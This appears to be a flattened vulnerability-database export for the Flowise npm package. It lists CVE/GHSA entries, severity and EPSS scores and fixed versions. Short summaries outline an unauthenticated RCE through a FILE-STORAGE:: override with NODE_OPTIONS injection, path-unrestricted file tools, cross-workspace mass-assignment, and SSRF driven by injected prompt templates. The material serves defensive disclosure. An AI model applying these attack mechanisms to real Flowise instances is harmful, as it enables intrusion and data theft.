url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm
fixed_packages
0
url pkg:npm/flowise@3.0.13
purl pkg:npm/flowise@3.0.13
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-5j9e-bcr5-n7bs
8
vulnerability VCID-5pup-kgaf-3ubw
9
vulnerability VCID-67mz-pfy4-ykep
10
vulnerability VCID-71uq-yx2j-cqak
11
vulnerability VCID-9rqv-p7rz-5kar
12
vulnerability VCID-a1e4-f5dh-w3a5
13
vulnerability VCID-aqg8-6us7-uqef
14
vulnerability VCID-b97u-efzx-dffn
15
vulnerability VCID-bkmk-k9mn-ekhx
16
vulnerability VCID-cb6d-4c2v-w7c3
17
vulnerability VCID-cxja-9yxc-k7au
18
vulnerability VCID-d4wa-szeh-43ab
19
vulnerability VCID-dzed-27rk-3qav
20
vulnerability VCID-e65e-s5sd-kuhp
21
vulnerability VCID-ejdc-j73x-jydk
22
vulnerability VCID-fu6t-9dk4-jbh9
23
vulnerability VCID-gt6n-beak-33gy
24
vulnerability VCID-gvpx-4wkw-43cz
25
vulnerability VCID-hdej-umwh-kqav
26
vulnerability VCID-hkfs-v3bp-kbh5
27
vulnerability VCID-j5hh-haj2-qydg
28
vulnerability VCID-kpyg-gve3-b3av
29
vulnerability VCID-pzza-9xq9-a7de
30
vulnerability VCID-qm89-q2ar-uyhy
31
vulnerability VCID-r74e-k86f-7qgb
32
vulnerability VCID-rgmv-6bqh-eqf2
33
vulnerability VCID-s3jg-wce1-fbf3
34
vulnerability VCID-tdm1-91mc-8kgr
35
vulnerability VCID-v1nz-wwsu-qycg
36
vulnerability VCID-v9hg-7pex-g3dp
37
vulnerability VCID-w9yr-5jbp-q7fm
38
vulnerability VCID-xt1d-efw7-g3c6
39
vulnerability VCID-z1y2-f2ws-8ycb
40
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13
aliases CVE-2026-30823, GHSA-cwc3-p92j-g7qm
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-m3j3-4u39-euht
41
url VCID-pzza-9xq9-a7de
vulnerability_id VCID-pzza-9xq9-a7de
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, Flowise is vulnerable to a critical unauthenticated remote command execution (RCE) vulnerability. It can be exploited via a parameter override bypass using the FILE-STORAGE:: keyword combined with a NODE_OPTIONS environment variable injection. This allows for the execution of arbitrary system commands with root privileges within the containerized Flowise instance, requiring only a single HTTP request and no authentication or knowledge of the instance. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41268
reference_id
reference_type
scores
0
value 0.0139
scoring_system epss
scoring_elements 0.80839
published_at 2026-06-14T12:55:00Z
1
value 0.0139
scoring_system epss
scoring_elements 0.80777
published_at 2026-06-11T12:55:00Z
2
value 0.0139
scoring_system epss
scoring_elements 0.80848
published_at 2026-06-13T12:55:00Z
3
value 0.0139
scoring_system epss
scoring_elements 0.80837
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41268
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41268
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41268
2
reference_url https://github.com/advisories/GHSA-cvrr-qhgw-2mm6
reference_id GHSA-cvrr-qhgw-2mm6
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-cvrr-qhgw-2mm6
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cvrr-qhgw-2mm6
reference_id GHSA-cvrr-qhgw-2mm6
reference_type
scores
0
value 7.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L
1
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:19:30Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cvrr-qhgw-2mm6
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41268, GHSA-cvrr-qhgw-2mm6
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pzza-9xq9-a7de
42
url VCID-qgs1-hazv-67b8
vulnerability_id VCID-qgs1-hazv-67b8
summary Flowise is a drag & drop user interface to build a customized large language model flow. In versions prior to 3.0.8, WriteFileTool and ReadFileTool in Flowise do not restrict file path access, allowing authenticated attackers to exploit this vulnerability to read and write arbitrary files to any path in the file system, potentially leading to remote command execution. Flowise 3.0.8 fixes this vulnerability.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-61913
reference_id
reference_type
scores
0
value 0.01058
scoring_system epss
scoring_elements 0.78099
published_at 2026-06-12T12:55:00Z
1
value 0.01058
scoring_system epss
scoring_elements 0.78031
published_at 2026-06-11T12:55:00Z
2
value 0.01159
scoring_system epss
scoring_elements 0.7907
published_at 2026-06-14T12:55:00Z
3
value 0.01159
scoring_system epss
scoring_elements 0.79073
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-61913
1
reference_url https://github.com/FlowiseAI/Flowise/pull/5275
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/pull/5275
2
reference_url https://github.com/FlowiseAI/Flowise/commit/1fb12cd93143592a18995f63b781d25b354d48a3
reference_id 1fb12cd93143592a18995f63b781d25b354d48a3
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/
url https://github.com/FlowiseAI/Flowise/commit/1fb12cd93143592a18995f63b781d25b354d48a3
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-61913
reference_id CVE-2025-61913
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-61913
4
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.8
reference_id flowise%403.0.8
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.8
5
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c
reference_id GHSA-j44m-5v8f-gc9c
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c
6
reference_url https://github.com/advisories/GHSA-jv9m-vf54-chjj
reference_id GHSA-jv9m-vf54-chjj
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jv9m-vf54-chjj
7
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj
reference_id GHSA-jv9m-vf54-chjj
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj
fixed_packages
0
url pkg:npm/flowise@3.0.8
purl pkg:npm/flowise@3.0.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-488c-vrqu-f7hf
8
vulnerability VCID-5j9e-bcr5-n7bs
9
vulnerability VCID-5pup-kgaf-3ubw
10
vulnerability VCID-67mz-pfy4-ykep
11
vulnerability VCID-6ufs-d346-d7ev
12
vulnerability VCID-71uq-yx2j-cqak
13
vulnerability VCID-9bht-svq8-87b4
14
vulnerability VCID-9rqv-p7rz-5kar
15
vulnerability VCID-a1e4-f5dh-w3a5
16
vulnerability VCID-affy-v76q-fub6
17
vulnerability VCID-aqg8-6us7-uqef
18
vulnerability VCID-b97u-efzx-dffn
19
vulnerability VCID-bkmk-k9mn-ekhx
20
vulnerability VCID-cb6d-4c2v-w7c3
21
vulnerability VCID-cxja-9yxc-k7au
22
vulnerability VCID-d4wa-szeh-43ab
23
vulnerability VCID-dtss-epth-z7fh
24
vulnerability VCID-dzed-27rk-3qav
25
vulnerability VCID-e65e-s5sd-kuhp
26
vulnerability VCID-ejdc-j73x-jydk
27
vulnerability VCID-fu6t-9dk4-jbh9
28
vulnerability VCID-gt6n-beak-33gy
29
vulnerability VCID-gvpx-4wkw-43cz
30
vulnerability VCID-hdej-umwh-kqav
31
vulnerability VCID-hkfs-v3bp-kbh5
32
vulnerability VCID-j5hh-haj2-qydg
33
vulnerability VCID-jcze-eg2c-mkcf
34
vulnerability VCID-k579-xd81-hqdu
35
vulnerability VCID-kpyg-gve3-b3av
36
vulnerability VCID-ksmv-s6c9-t7ap
37
vulnerability VCID-m3j3-4u39-euht
38
vulnerability VCID-pzza-9xq9-a7de
39
vulnerability VCID-qm89-q2ar-uyhy
40
vulnerability VCID-r74e-k86f-7qgb
41
vulnerability VCID-rgmv-6bqh-eqf2
42
vulnerability VCID-s3jg-wce1-fbf3
43
vulnerability VCID-tdm1-91mc-8kgr
44
vulnerability VCID-v1nz-wwsu-qycg
45
vulnerability VCID-v9hg-7pex-g3dp
46
vulnerability VCID-w9yr-5jbp-q7fm
47
vulnerability VCID-xt1d-efw7-g3c6
48
vulnerability VCID-ywgu-76cy-uqe7
49
vulnerability VCID-z1y2-f2ws-8ycb
50
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8
aliases CVE-2025-61913, GHSA-jv9m-vf54-chjj
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qgs1-hazv-67b8
43
url VCID-qm89-q2ar-uyhy
vulnerability_id VCID-qm89-q2ar-uyhy
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, evaluation create and update mass-assignment allows cross-workspace evaluation takeover. This issue has been patched in version 3.1.2.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-46479
reference_id
reference_type
scores
0
value 0.00053
scoring_system epss
scoring_elements 0.17095
published_at 2026-06-12T12:55:00Z
1
value 0.00053
scoring_system epss
scoring_elements 0.17107
published_at 2026-06-13T12:55:00Z
2
value 0.00053
scoring_system epss
scoring_elements 0.16939
published_at 2026-06-11T12:55:00Z
3
value 0.00059
scoring_system epss
scoring_elements 0.18998
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-46479
1
reference_url https://github.com/FlowiseAI/Flowise/commit/dc07f4062b852033554543a3cff3daf3433b0dac
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/commit/dc07f4062b852033554543a3cff3daf3433b0dac
2
reference_url https://github.com/FlowiseAI/Flowise/pull/6050
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/pull/6050
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-46479
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-46479
4
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
reference_id flowise%403.1.2
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-08T15:50:48Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
5
reference_url https://github.com/advisories/GHSA-mq53-pc65-wjc4
reference_id GHSA-mq53-pc65-wjc4
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-mq53-pc65-wjc4
6
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-mq53-pc65-wjc4
reference_id GHSA-mq53-pc65-wjc4
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-08T15:50:48Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-mq53-pc65-wjc4
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
aliases CVE-2026-46479, GHSA-mq53-pc65-wjc4
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qm89-q2ar-uyhy
44
url VCID-r74e-k86f-7qgb
vulnerability_id VCID-r74e-k86f-7qgb
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, CustomTemplate create and update mass-assignment allows cross-workspace template takeover. This issue has been patched in version 3.1.2.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-46476
reference_id
reference_type
scores
0
value 0.00053
scoring_system epss
scoring_elements 0.17095
published_at 2026-06-12T12:55:00Z
1
value 0.00053
scoring_system epss
scoring_elements 0.17107
published_at 2026-06-13T12:55:00Z
2
value 0.00053
scoring_system epss
scoring_elements 0.16939
published_at 2026-06-11T12:55:00Z
3
value 0.00059
scoring_system epss
scoring_elements 0.18998
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-46476
1
reference_url https://github.com/FlowiseAI/Flowise/commit/f64047bdcf4cbd6a30ec348b9e3f2899ff514e89
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/commit/f64047bdcf4cbd6a30ec348b9e3f2899ff514e89
2
reference_url https://github.com/FlowiseAI/Flowise/pull/6129
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/pull/6129
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-46476
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-46476
4
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
reference_id flowise%403.1.2
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-06-08T16:27:06Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
5
reference_url https://github.com/advisories/GHSA-728h-4mwj-f2p4
reference_id GHSA-728h-4mwj-f2p4
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-728h-4mwj-f2p4
6
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-728h-4mwj-f2p4
reference_id GHSA-728h-4mwj-f2p4
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-06-08T16:27:06Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-728h-4mwj-f2p4
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
aliases CVE-2026-46476, GHSA-728h-4mwj-f2p4
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-r74e-k86f-7qgb
45
url VCID-rgmv-6bqh-eqf2
vulnerability_id VCID-rgmv-6bqh-eqf2
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Server-Side Request Forgery (SSRF) vulnerability exists in FlowiseAI's POST/GET API Chain components that allows unauthenticated attackers to force the server to make arbitrary HTTP requests to internal and external systems. By injecting malicious prompt templates, attackers can bypass the intended API documentation constraints and redirect requests to sensitive internal services, potentially leading to internal network reconnaissance and data exfiltration. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41271
reference_id
reference_type
scores
0
value 0.00115
scoring_system epss
scoring_elements 0.30036
published_at 2026-06-12T12:55:00Z
1
value 0.00115
scoring_system epss
scoring_elements 0.30035
published_at 2026-06-14T12:55:00Z
2
value 0.00115
scoring_system epss
scoring_elements 0.29839
published_at 2026-06-11T12:55:00Z
3
value 0.00115
scoring_system epss
scoring_elements 0.30053
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41271
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41271
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41271
2
reference_url https://github.com/advisories/GHSA-6r77-hqx7-7vw8
reference_id GHSA-6r77-hqx7-7vw8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6r77-hqx7-7vw8
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6r77-hqx7-7vw8
reference_id GHSA-6r77-hqx7-7vw8
reference_type
scores
0
value 7.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T19:45:41Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6r77-hqx7-7vw8
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41271, GHSA-6r77-hqx7-7vw8
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rgmv-6bqh-eqf2
46
url VCID-s3jg-wce1-fbf3
vulnerability_id VCID-s3jg-wce1-fbf3
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, evaluator create and update mass-assignment allows cross-workspace evaluator takeover. This issue has been patched in version 3.1.2.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-46480
reference_id
reference_type
scores
0
value 0.00128
scoring_system epss
scoring_elements 0.31915
published_at 2026-06-13T12:55:00Z
1
value 0.00128
scoring_system epss
scoring_elements 0.31898
published_at 2026-06-12T12:55:00Z
2
value 0.00128
scoring_system epss
scoring_elements 0.31709
published_at 2026-06-11T12:55:00Z
3
value 0.00143
scoring_system epss
scoring_elements 0.34561
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-46480
1
reference_url https://github.com/FlowiseAI/Flowise/commit/dc07f4062b852033554543a3cff3daf3433b0dac
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/commit/dc07f4062b852033554543a3cff3daf3433b0dac
2
reference_url https://github.com/FlowiseAI/Flowise/pull/6050
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/pull/6050
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-46480
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-46480
4
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
reference_id flowise%403.1.2
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-08T16:17:00Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
5
reference_url https://github.com/advisories/GHSA-wxrr-jp8m-qq7f
reference_id GHSA-wxrr-jp8m-qq7f
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wxrr-jp8m-qq7f
6
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wxrr-jp8m-qq7f
reference_id GHSA-wxrr-jp8m-qq7f
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-08T16:17:00Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wxrr-jp8m-qq7f
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
